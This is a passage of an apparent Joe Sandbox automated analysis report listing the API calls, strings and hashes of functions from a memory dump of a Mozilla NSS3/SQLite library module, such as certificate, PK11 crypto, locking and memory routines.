PK11_Authenticate.NSS3(?,00000001,?), ref: 6C82EF53

Part of subcall function 6C834C20: TlsGetValue.KERNEL32 ref: 6C834C4C
Part of subcall function 6C834C20: EnterCriticalSection.KERNEL32(?), ref: 6C834C60
Part of subcall function 6C834C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C834CA1
Part of subcall function 6C834C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C834CBE
Part of subcall function 6C834C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C834CD2
Part of subcall function 6C834C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C834D3A

PR_GetCurrentThread.NSS3 ref: 6C82EF9E

Part of subcall function 6C8B9BF0: TlsGetValue.KERNEL32(?,?,?,6C900A75), ref: 6C8B9C07

free.MOZGLUE(00000000), ref: 6C82EFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C82F016
free.MOZGLUE(00000000), ref: 6C82F022

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: a9e53023f8d7d9d31d1d2205168db4f86b85dd2c42a5c14698ae3df945df61a3
Instruction ID: ee840b11d088436cb984d1255e624509f4895325ce619def6bfa69464f757f96
Opcode Fuzzy Hash: a9e53023f8d7d9d31d1d2205168db4f86b85dd2c42a5c14698ae3df945df61a3
Instruction Fuzzy Hash: 0D41A1B1E00209AFDF118FA9DD44BEEBBB9AB48348F004439F914A6350E7768955CBE1

Function 6C80E400 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C813F23,?), ref: 6C80E432
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C813F23,?), ref: 6C80E44F

Part of subcall function 6C812C40: TlsGetValue.KERNEL32(6C813F23,?,6C80E477,?,?,?,00000001,00000000,?,?,6C813F23,?), ref: 6C812C62
Part of subcall function 6C812C40: EnterCriticalSection.KERNEL32(0000001C,?,6C80E477,?,?,?,00000001,00000000,?,?,6C813F23,?), ref: 6C812C76
Part of subcall function 6C812C40: PL_HashTableLookup.NSS3(00000000,?,?,6C80E477,?,?,?,00000001,00000000,?,?,6C813F23,?), ref: 6C812C86
Part of subcall function 6C812C40: PR_Unlock.NSS3(00000000,?,?,?,?,6C80E477,?,?,?,00000001,00000000,?,?,6C813F23,?), ref: 6C812C93

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C813F23,?), ref: 6C80E494
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C813F23,?), ref: 6C80E4AD
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C813F23,?), ref: 6C80E4D6
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C813F23,?), ref: 6C80E52F

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: e291753cd8544cb285d340dac57f1323c291a44b75f14728aa44ba811dac8a66
Instruction ID: 1ad06f6810a2961c15e2009fd668f85a437fbade2fbe95266fae61039527bf25
Opcode Fuzzy Hash: e291753cd8544cb285d340dac57f1323c291a44b75f14728aa44ba811dac8a66
Instruction Fuzzy Hash: 18411BB5A08A058FCB20EF78D68455BBBF0FF05304F154D69D8949BB11E730E884CB92

Function 6C81CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6C81CF80
SECITEM_DupItem_Util.NSS3(?), ref: 6C81D002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C81D016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C81D025
PR_NewLock.NSS3 ref: 6C81D043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C81D074

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: a58d604a9c7a6f279f798fff591cc27864a75291d3c9c3e0da5429388011c23b
Instruction ID: 75c81164ff79521dc97af019074abbb3feee3fda5c245000f04c09d762c38d2f
Opcode Fuzzy Hash: a58d604a9c7a6f279f798fff591cc27864a75291d3c9c3e0da5429388011c23b
Instruction Fuzzy Hash: 4341C2B1A093169FDB21DF29CA8479A7BE4AF08318F10497ADC198FF46D770D885CB91

Function 6C8065D0 Relevance: 9.1, APIs: 6, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(-00000007), ref: 6C80660F

Part of subcall function 6C850BE0: malloc.MOZGLUE(6C848D2D,?,00000000,?), ref: 6C850BF8
Part of subcall function 6C850BE0: TlsGetValue.KERNEL32(6C848D2D,?,00000000,?), ref: 6C850C15

free.MOZGLUE(00000000), ref: 6C806660
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C80667B
SGN_DecodeDigestInfo.NSS3(?), ref: 6C80669B
SECOID_GetAlgorithmTag_Util.NSS3(-00000004), ref: 6C8066B0
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C8066C8

Part of subcall function 6C8325D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C80662E,?,?), ref: 6C832670
Part of subcall function 6C8325D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C80662E,?), ref: 6C832684
Part of subcall function 6C8325D0: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C8326C2
Part of subcall function 6C8325D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C8326E0
Part of subcall function 6C8325D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C8326F4
Part of subcall function 6C8325D0: PR_Unlock.NSS3(?), ref: 6C83274D

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: UtilValue$CriticalEnterSectionUnlock$AlgorithmAlloc_Arena_DecodeDigestErrorFreeInfoTag_freemalloc
String ID:
API String ID: 2025608128-0
Opcode ID: d0397d9b0bf3ead4e76531f355eeb0fb958ac8dcf07dfc6597db533dcfda9130
Instruction ID: 0f7ab0c2d2834b9fc923f0d016ce9cb1e69d236573d50445f7db9be20f04bc84
Opcode Fuzzy Hash: d0397d9b0bf3ead4e76531f355eeb0fb958ac8dcf07dfc6597db533dcfda9130
Instruction Fuzzy Hash: AB313DB5A012199BDB10DFA8DD81AAE77B4AF49358F140538ED19EB700E731D944CBA1

Function 6C802E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C7F2D1A), ref: 6C802E7E

Part of subcall function 6C8507B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C7F8298,?,?,?,6C7EFCE5,?), ref: 6C8507BF
Part of subcall function 6C8507B0: PL_HashTableLookup.NSS3(?,?), ref: 6C8507E6
Part of subcall function 6C8507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C85081B
Part of subcall function 6C8507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C850825

PR_Now.NSS3 ref: 6C802EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C802EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C7F2D1A), ref: 6C802F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C7F2D1A), ref: 6C802F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C802F81

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: d786ad3c996f708ebb59d7cba4e77b87118b05c8b9aba0d2a8a0c51581b4a597
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 643125717011048BF730C659CE8CBAE7365EF81398F640D7AD52997AD0EBB9988AC611

Function 6C7F0E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C7F0A2C), ref: 6C7F0E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C7F0A2C), ref: 6C7F0E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C7F0A2C), ref: 6C7F0E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C7F0A2C), ref: 6C7F0E90
free.MOZGLUE(00000000), ref: 6C7F0EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C7F0A2C), ref: 6C7F0ED9

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 5c8d3804e111a3dca9f01da41beef705d63febf7a2019ddbd8603bbe240e55e1
Instruction ID: 6ca926d528fe47f845c3df6a54104e3a2df1a8e3ab7b0255f11089269f0852d4
Opcode Fuzzy Hash: 5c8d3804e111a3dca9f01da41beef705d63febf7a2019ddbd8603bbe240e55e1
Instruction Fuzzy Hash: 47216E76F012844BEB10A97A9EC5B6B72AEDBC170CF194435D83893B02EB60C81682A1

Function 6C7FAE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C7FAEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C7FAECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7FAEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C7FAF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C919500), ref: 6C7FAF23

Part of subcall function 6C84F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C84F0C8
Part of subcall function 6C84F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C84F122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7FAF37

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: e5ad0e63f016714022f62cda7a0a655e7aec7fc38a477b52e00125117408f4d4
Instruction ID: d8c410db1870dbd23ee5cf0e1a26353f345e58efd2ee09c465f89e2c64236123
Opcode Fuzzy Hash: e5ad0e63f016714022f62cda7a0a655e7aec7fc38a477b52e00125117408f4d4
Instruction Fuzzy Hash: 292128719093009BE7108E189E81B9A7BE4AF8573CF144728EC649F7D1E731D50687A3

Function 6C87EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C87EE85
realloc.MOZGLUE(8F4AB0E8,?), ref: 6C87EEAE
PORT_Alloc_Util.NSS3(?), ref: 6C87EEC5

Part of subcall function 6C850BE0: malloc.MOZGLUE(6C848D2D,?,00000000,?), ref: 6C850BF8
Part of subcall function 6C850BE0: TlsGetValue.KERNEL32(6C848D2D,?,00000000,?), ref: 6C850C15

htonl.WSOCK32(?), ref: 6C87EEE3
htonl.WSOCK32(00000000,?), ref: 6C87EEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C87EF01

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: deebcdcddb74c92fdcc2b10452f5336417c5487f3b862e78d7da276a44874511
Instruction ID: ed5f775f6d7a8b1e426dff1bacae02d896f9762aa63d56f9f85e00f12ce67a17
Opcode Fuzzy Hash: deebcdcddb74c92fdcc2b10452f5336417c5487f3b862e78d7da276a44874511
Instruction Fuzzy Hash: CE21B132A042149FCB309F28DD80A9AB7A4EF45358F158969EC599B641E330E854CBF6

Function 6C82EE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C82EE49

Part of subcall function 6C84FAB0: free.MOZGLUE(?,-00000001,?,?,6C7EF673,00000000,00000000), ref: 6C84FAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C82EE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C82EE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C82EE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C82EEB3

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: 32b6b5e2bd2c889a9fc2abe2ac9ea3203299393b5ebf7a3b2a163cfa0e649c4d
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: A52108BAA002156BEB218E28DD85EABB7A8EF05718F084974FD049B701E771DC5487F1

Function 6C7DC4E0 Relevance: 9.1, APIs: 6, Instructions: 52COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C7DC4F0
free.MOZGLUE ref: 6C7DC51A
TlsSetValue.KERNEL32 ref: 6C7DC540
free.MOZGLUE ref: 6C7DC557
DeleteCriticalSection.KERNEL32 ref: 6C7DC56A
free.MOZGLUE ref: 6C7DC576

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: free$Value$CriticalDeleteSection
String ID:
API String ID: 195087141-0
Opcode ID: 2ff8b676fdad17b972973af7cef7f8ec0804312494b12cf16390250cfb678c5d
Instruction ID: 5df258faba035a0a585a5c95364f5fb2978b171bbc2dae5f52204ac591369032
Opcode Fuzzy Hash: 2ff8b676fdad17b972973af7cef7f8ec0804312494b12cf16390250cfb678c5d
Instruction Fuzzy Hash: 02111C74608B008FDB10BF79C14915ABBF4BF45749F154E2DD8C687700EB30A158CB82

Function 6C7FE520 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(00000000,?,?,6C807F5D,00000000,00000000,?,?,?,6C8080DD), ref: 6C7FE532

Part of subcall function 6C8B9090: TlsGetValue.KERNEL32 ref: 6C8B90AB
Part of subcall function 6C8B9090: TlsGetValue.KERNEL32 ref: 6C8B90C9
Part of subcall function 6C8B9090: EnterCriticalSection.KERNEL32 ref: 6C8B90E5
Part of subcall function 6C8B9090: TlsGetValue.KERNEL32 ref: 6C8B9116
Part of subcall function 6C8B9090: LeaveCriticalSection.KERNEL32 ref: 6C8B913F

PR_EnterMonitor.NSS3(6C8080DD), ref: 6C7FE549

Part of subcall function 6C8B9090: LeaveCriticalSection.KERNEL32 ref: 6C8B91AA
Part of subcall function 6C8B9090: TlsGetValue.KERNEL32 ref: 6C8B9212
Part of subcall function 6C8B9090: _PR_MD_WAIT_CV.NSS3 ref: 6C8B926B

PR_ExitMonitor.NSS3 ref: 6C7FE56D
PL_HashTableDestroy.NSS3 ref: 6C7FE57B

Part of subcall function 6C7FE190: PR_EnterMonitor.NSS3(?,?,6C7FE175), ref: 6C7FE19C
Part of subcall function 6C7FE190: PR_EnterMonitor.NSS3(6C7FE175), ref: 6C7FE1AA
Part of subcall function 6C7FE190: PR_ExitMonitor.NSS3 ref: 6C7FE208
Part of subcall function 6C7FE190: PL_HashTableRemove.NSS3(?), ref: 6C7FE219
Part of subcall function 6C7FE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7FE231
Part of subcall function 6C7FE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7FE249
Part of subcall function 6C7FE190: PR_ExitMonitor.NSS3 ref: 6C7FE257

PR_ExitMonitor.NSS3(6C8080DD), ref: 6C7FE5B5
PR_DestroyMonitor.NSS3 ref: 6C7FE5C3

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Monitor$Enter$ExitValue$CriticalSection$Arena_DestroyFreeHashLeaveTableUtil$Remove
String ID:
API String ID: 3740585915-0
Opcode ID: 0a99d272b86669bef657dda00526b89d517a2494872fac1d247f8894d9cbbf08
Instruction ID: 804076d8424adba631724872aacfad5536c65a59899b65e89b07f8c80c9a6fcc
Opcode Fuzzy Hash: 0a99d272b86669bef657dda00526b89d517a2494872fac1d247f8894d9cbbf08
Instruction Fuzzy Hash: 4801D6B0E08184CBEF015B2ADE4665937B4B71328CF703432D81492715FB31D55BDB82

Function 6C7DAE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7DAFDA

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7DAFC4
misuse, xrefs: 6C7DAFCE
unable to delete/modify collation sequence due to active statements, xrefs: 6C7DAF5C
%s at line %d of [%.10s], xrefs: 6C7DAFD3

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 0da5bdccba48497bab98e709dbe1b40a62326f66af5097acc28559c8d309eea5
Instruction ID: 8453cbce05321ef6954b87b133c99318b6ae4962e4383c3d0ab6cd52f0d7b967
Opcode Fuzzy Hash: 0da5bdccba48497bab98e709dbe1b40a62326f66af5097acc28559c8d309eea5
Instruction Fuzzy Hash: 4191F475B012168FDB04CF29C994BAAB7F1BF49324F1A45A8E864AB791D334FD01CB61

Function 6C77E4C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C77E53A
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C77E5BC

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C77E525, 6C77E596, 6C77E5A7
%s at line %d of [%.10s], xrefs: 6C77E534, 6C77E5B6
database corruption, xrefs: 6C77E52F, 6C77E5B1

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: sqlite3_log
